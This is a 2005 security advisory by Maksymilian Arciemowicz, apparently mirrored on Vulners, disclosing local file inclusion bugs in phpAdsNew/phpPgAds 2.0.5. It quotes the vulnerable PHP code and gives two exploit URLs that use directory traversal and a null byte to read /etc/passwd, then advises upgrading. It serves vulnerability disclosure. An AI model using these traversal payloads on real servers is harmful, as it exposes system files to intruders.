Vulners
Lucene search
phpAdsNew205.txt
🗓️ 18 Aug 2005 00:00:00Reported by Maksymilian ArciemowiczType 
packetstorm🔗 packetstormsecurity.com👁 17 Views
`-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
[phpAdsNew/phpPgAds 2.0.5 Local file inclusion cXIb8O3.16]
Author: Maksymilian Arciemowicz (cXIb8O3)
from SECURITYREASON.COM TEAM
Date: 14.07.2005 (01:54 GMT+01.00)
- --- 0.Description ---
phpAdsNew is an open-source ad server, with an integrated banner management interface and tracking system for gathering statistics. With phpAdsNew you can easily rotate paid banners and your own in-house advertisements. You can even integrate banners from third party advertising companies.
- --- 1. Local file inclusion ---
In phpAdsNew and phpPgAds 2.0.5 exists two bugs. First bug exist in adlayer.php.
Code:
- -151-153---
phpAds_registerGlobal ('what', 'clientid', 'clientID', 'context',
'target', 'source', 'withtext', 'withText',
'layerstyle');
- -151-153---
and
- -178-182---
if (!isset($layerstyle) || empty($layerstyle)) $layerstyle = 'geocities';
// Include layerstyle
require(phpAds_path.'/libraries/layerstyles/'.$layerstyle.'/layerstyle.inc.php');
- -178-182---
Varible $layerstyle isn't filtered and you can try to include local file.
For example error:
http://[HOST]/[DIR]/adlayer.php?layerstyle=securityreason.com
and you can see error like this:
- ---
<br />
<b>Warning</b>: main(): Unable to access ./libraries/layerstyles/securityreason.com/layerstyle.inc.php in <b>/www/phpadsnew-2.0.5/adlayer.php</b> on line <b>181</b><br />
<br />
<b>Warning</b>: main(./libraries/layerstyles/securityreason.com/layerstyle.inc.php): failed to open stream: No such file or directory in <b>/www/phpadsnew-2.0.5/phpadsnew-2.0.5/adlayer.php</b> on line <b>181</b><br />
<br />
<b>Fatal error</b>: main(): Failed opening required './libraries/layerstyles/securityreason.com/layerstyle.inc.php' (include_path='.:') in <b>/www/phpadsnew-2.0.5/adlayer.php</b> on line <b>181</b><br />
- ---
Exploit:
http://[HOST]/[DIR]/adlayer.php?layerstyle=../../../../../../../etc/passwd%00
Magic_quotes must be OFF .
Next problem exist in ./admin/js-form.php
Code:
- -26-28---
@include (phpAds_path.'/language/english/default.lang.php');
if ($HTTP_GET_VARS['language'] != 'english' && file_exists(phpAds_path.'/language/'.$HTTP_GET_VARS['language'].'/default.lang.php'))
@include (phpAds_path.'/language/'.$HTTP_GET_VARS['language'].'/default.lang.php');
- -26-28---
And if magic_quotes_gpc = Off, you can do attack.
Exploit:
http://[HOST]/[DIR]/admin/js-form.php?language=../../../../../../../../../../etc/passwd%00
but here you don't see any error because first is function file_exists.
- --- 3. How to fix ---
Download the new version of the script.
- --- 4. Greets ---
sp3x
- --- 5.Contact ---
Author: Maksymilian Arciemowicz < cXIb8O3 >
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
GPG-KEY: http://securityreason.com
WWW: http://securityreason.com
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.0 (FreeBSD)
iD8DBQFC23pYznmvyJCR4zQRAnKUAJ9oc6khDtnehufyXWMZQK1i5AFnJgCgmUjC
hROFCdP7k+/pi1dS9SJjCOw=
=yRLH
-----END PGP SIGNATURE-----
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
18 Aug 2005 00:00Current
7.4High risk
Vulners AI Score7.4